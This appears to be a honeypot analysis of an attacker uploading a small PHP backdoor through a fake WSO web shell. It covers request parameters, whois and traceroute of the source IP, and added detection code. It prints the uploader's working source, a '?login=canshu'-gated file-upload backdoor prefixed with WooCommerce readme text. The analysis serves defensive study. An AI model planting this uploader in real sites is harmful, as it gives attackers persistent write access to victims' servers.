File Uploader with weird IP address

Simple file uploader with strange whois information.

At least one other analysis of this uploader appears on the web.

Download

The attacker(s) seem to have believed they were accessing a WSO (Web Shell by oRb) web shell. They requested a URL ending in /wp-content/themes/twentytwelve/404.php, a common spot for "hidden" web shells and backdoors to reside. The HTTP POST request came with parameters typical for WSO:

| Name    | Value                                          |
|---------|------------------------------------------------|
| a       | FilesMAn                                       |
| c       | /var/www/html/wp-content/themes/twentytwelve/  |
| p1      | uploadFile                                     |
| charset | Windows-1251                                   |

The "a" parameter even has the odd "FilesMAn" camel-case that appears in lots of WSO source.

The file was named "gan.php" on the attacker(s)' machine.

This particular WSO access had a cookie that WSO accepted as meaning "previously logged in".

The attacker logged in with a password of "w" 29 seconds earlier. This was probably a manual install, with a browser driven by a human user. The IP address asked for favicon.ico and the purported WSO URL immediately before this download.

The downloader identified itself as "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0"

p0f3 identified the IP address as running "Windows 7 or 8", so the user agent string reconciles.

IP Address 154.48.243.123

whois says that it's a Cogent IP address, but the AfriNIC Whois server answers, which is weird.

```
% This is the AfriNIC Whois server.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/

NetRange:       154.48.0.0 - 154.48.255.255
CIDR:           154.48.0.0/16
NetName:        COGENT-154-48-16
NetHandle:      NET-154-48-0-0-1
Parent:         NET154 (NET-154-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS174
Organization:   PSINet, Inc. (PSI-2)
RegDate:        1992-02-05
Updated:        2017-10-30
Ref:            https://rdap.arin.net/registry/ip/154.48.0.0
```

traceroute shows a route from Denver, CO, US through cogentco.com addresses, then on to a set of NTT.com (Japanese telecom) IP addresses:

```
traceroute to 154.48.243.123 (154.48.243.123), 30 hops max, 60 byte packets
 1  blahblah (612.624.54.912)  62.843 ms  62.827 ms  62.778 ms
 2  10.100.100.2 (10.100.100.2)  62.755 ms  62.921 ms  62.694 ms
 3  te0-0-1-1.nr11.b004491-1.den01.atlas.cogentco.com (38.122.238.45)  65.324 ms  65.302 ms  77.824 ms
 4  te0-0-2-2.nr11.b006545-1.den01.atlas.cogentco.com (154.24.53.101)  87.984 ms  87.969 ms  87.925 ms
 5  te0-0-1-2.agr14.den01.atlas.cogentco.com (154.24.17.121)  87.883 ms te0-0-2-1.agr12.den01.atlas.cogentco.com (154.24.13.53)  87.861 ms te0-0-1-2.agr13.den01.atlas.cogentco.com (154.24.17.117)  87.803 ms
 6  te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229)  87.754 ms te0-7-0-11.ccr22.den01.atlas.cogentco.com (154.54.31.125)  40.248 ms te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229)  40.188 ms
 7  be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90)  72.882 ms be3036.ccr22.mci01.atlas.cogentco.com (154.54.31.90)  72.841 ms be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90)  78.145 ms
 8  be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)  75.335 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)  75.280 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)  75.261 ms
 9  be2764.ccr41.dfw03.atlas.cogentco.com (154.54.47.214)  89.879 ms  89.816 ms be2763.ccr41.dfw03.atlas.cogentco.com (154.54.28.74)  89.809 ms
10  ae-5.r10.dllstx09.us.bb.gin.ntt.net (129.250.9.205)  89.784 ms  89.743 ms  89.888 ms
11  ae-0.r23.dllstx09.us.bb.gin.ntt.net (129.250.5.5)  89.861 ms  89.835 ms  56.434 ms
12  ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154)  81.747 ms  81.469 ms  84.352 ms
13  ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77)  189.215 ms  189.151 ms  189.145 ms
14  ae-4.r24.tkokhk01.hk.bb.gin.ntt.net (129.250.2.51)  236.345 ms  295.354 ms  298.360 ms
15  ae-1.r03.tkokhk01.hk.bb.gin.ntt.net (129.250.6.98)  298.339 ms  298.282 ms  298.272 ms
16  ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125)  290.508 ms ae-1.a01.newthk03.hk.bb.gin.ntt.net (129.250.5.253)  290.493 ms ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125)  290.426 ms
17  xe-0-0-19-2-381.a01.newthk03.hk.ce.gin.ntt.net (192.80.17.90)  293.034 ms  267.935 ms  255.536 ms
18  * * *
19  * * *
20  154.48.243.123 (154.48.243.123)  222.118 ms  222.107 ms  217.720 ms
```

Notice the big jump in response times between ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154), and ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77). The great circle distance from San Jose to Tokyo is 5186 miles, so speed-of-light lag is only about 0.03 seconds, or 30 milliseconds. The next big jump in time is from ae-21.r30.tokyjp05.jp.bb.gin.ntt.net to ae-4.r24.tkokhk01.hk.bb.gin.ntt.net, which conveniently has "tkokhk01", "Tokyo to Hong Kong" probably, in its name.
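The speed-of-light argument above, worked through as an added example (not part of the original write-up): it recomputes the San Jose to Tokyo great-circle distance, the one-way vacuum bound the text quotes, and also the round-trip-in-fibre bound, which is what traceroute actually measures, then compares that with the jump between hops 12 and 13. City-centre coordinates and a fibre refractive index of 1.47 are assumptions.

```python
import math

EARTH_RADIUS_KM = 6371.0
C_VACUUM_KM_S = 299792.458
C_FIBRE_KM_S = C_VACUUM_KM_S / 1.47   # assumed typical refractive index of silica fibre

# Assumed approximate city centres; the routers' true locations are unknown.
SAN_JOSE = (37.3382, -121.8863)
TOKYO = (35.6762, 139.6503)

def great_circle_km(a, b):
    """Haversine great-circle distance between two (lat, lon) points given in degrees."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(h))

def latency_bounds_ms(distance_km):
    """One-way delay at c (the figure the text uses) and the tighter, more realistic
    round-trip delay in fibre; traceroute probe times are round trips."""
    one_way_vacuum = distance_km / C_VACUUM_KM_S * 1000
    rtt_fibre = 2 * distance_km / C_FIBRE_KM_S * 1000
    return one_way_vacuum, rtt_fibre

def hop_jump_ms(prev_rtts, next_rtts):
    """Latency added by one hop: compare the best probe of each hop, which
    suppresses queueing noise better than comparing averages."""
    return min(next_rtts) - min(prev_rtts)

# Probe times copied from hops 12 and 13 of the traceroute above.
SNJSCA04 = (81.747, 81.469, 84.352)
TOKYJP05 = (189.215, 189.151, 189.145)

def check_hop():
    """Return (distance_km, one_way_ms, fibre_rtt_ms, observed_jump_ms, jump_exceeds_fibre_rtt)."""
    d = great_circle_km(SAN_JOSE, TOKYO)
    one_way, rtt = latency_bounds_ms(d)
    jump = hop_jump_ms(SNJSCA04, TOKYJP05)
    return d, one_way, rtt, jump, jump > rtt

if __name__ == "__main__":
    d, one_way, rtt, jump, excess = check_hop()
    print(f"{d:.0f} km, one-way at c {one_way:.1f} ms, fibre RTT {rtt:.1f} ms, hop jump {jump:.1f} ms")
```

Even the fibre round-trip bound is well under the observed jump, so the extra delay comes from the path or queueing, not from distance alone.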

ipaddres.is puts it on a peninsula on a lake near Hutchinson, KS, USA.

I don't think there's anything nefarious here, just that NTT isn't doing a great job of publicizing where its IP addresses live. I also think that Cogent has sold/leased a block of IP addresses to someplace in Hong Kong. The record keeping doesn't seem to have caught up.

Analysis

This uploader protects itself by only functioning if an HTTP GET request includes the string ?login=canshu in the URL.

Even a pretty-printed version of this uploader is small enough to include directly:

```php
=== WooCommerce ===
Contributors: automattic, mikejolley, jameskoster, claudiosanches, claudiulodro, kloon, rodrigosprimo, jshreve, coderkevin
Tags: ecommerce, e-commerce, store, sales, sell, shop, cart, checkout, downloadable, downloads, paypal, storefront, woo commerce
what times wordpress
<?php 
if ($_GET["login"] == "canshu") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>Upload Complate !!!</b><br>';
    }
    echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" size="50"><input type="submit" value="submit"/></form>';
}
```

This code has some weird aspects. The PHP interpreter will print the small block of pure ASCII text just before the <?php tag on every access. At first, I thought this was a Google "dork", some chunk of text that Google would index, and attacker(s) could find with a simple search. As of 2019-03-02, this downloader does exist in some Russian-language web pages. You can find it using the block of text. But downloaders are not the most common thing you find using the block of text. You get many more hits on plain Woo Commerce installs. The block of text also appears in readme.txt files in Woo Commerce plugin installs. I don't know what to make of the inclusion of that chunk of text.

It also generates incomplete HTML: there are no <html> or <body> tags around the HTML <form> it outputs. This is just shoddy.
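The two request patterns this write-up documents, the WSO-style POST to a theme 404.php (parameters a, c, p1, charset) and the uploader's ?login=canshu gate, lend themselves to a simple request-level detection. The following is an added example, not code from the original page: it parses raw captured HTTP requests and reports which indicators fire. The sample requests are constructed, modelled on the ones described above, and the host name is a placeholder.

```python
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the write-up. Only the WSO action value seen here is
# listed; other WSO action names can be added to the set as they are observed.
WSO_PARAM_NAMES = {"a", "c", "p1", "charset"}
WSO_ACTIONS = {"filesman"}          # compared case-insensitively ("FilesMAn")
UPLOADER_GATE = ("login", "canshu")

def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, query, headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(body).items()}
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "form": form}

def classify(req):
    """Return the list of detection reasons that fire for one request (empty if none)."""
    reasons = []
    path = req["path"].lower()
    if "/wp-content/themes/" in path and path.endswith("/404.php"):
        reasons.append("direct request to a theme 404.php, a common web shell location")
    form = req["form"]
    if req["method"] == "POST" and WSO_PARAM_NAMES <= set(form) \
            and form["a"].lower() in WSO_ACTIONS:
        reasons.append("WSO-style parameters (a=%s, p1=%s)" % (form["a"], form["p1"]))
    if req["query"].get(UPLOADER_GATE[0]) == UPLOADER_GATE[1]:
        reasons.append("canshu uploader gate ?login=canshu")
    return reasons

# Constructed samples modelled on the requests described in the write-up.
SAMPLE_WSO = ("POST /wp-content/themes/twentytwelve/404.php HTTP/1.1\r\n"
              "Host: example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
              "a=FilesMAn&c=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fthemes%2Ftwentytwelve%2F"
              "&p1=uploadFile&charset=Windows-1251")
SAMPLE_GATE = "GET /gan.php?login=canshu HTTP/1.1\r\nHost: example.test\r\n\r\n"
SAMPLE_BENIGN = "GET /index.php?p=1 HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    for raw in (SAMPLE_WSO, SAMPLE_GATE, SAMPLE_BENIGN):
        print(raw.split("\r\n")[0], "->", classify(parse_request(raw)) or "no indicators")
```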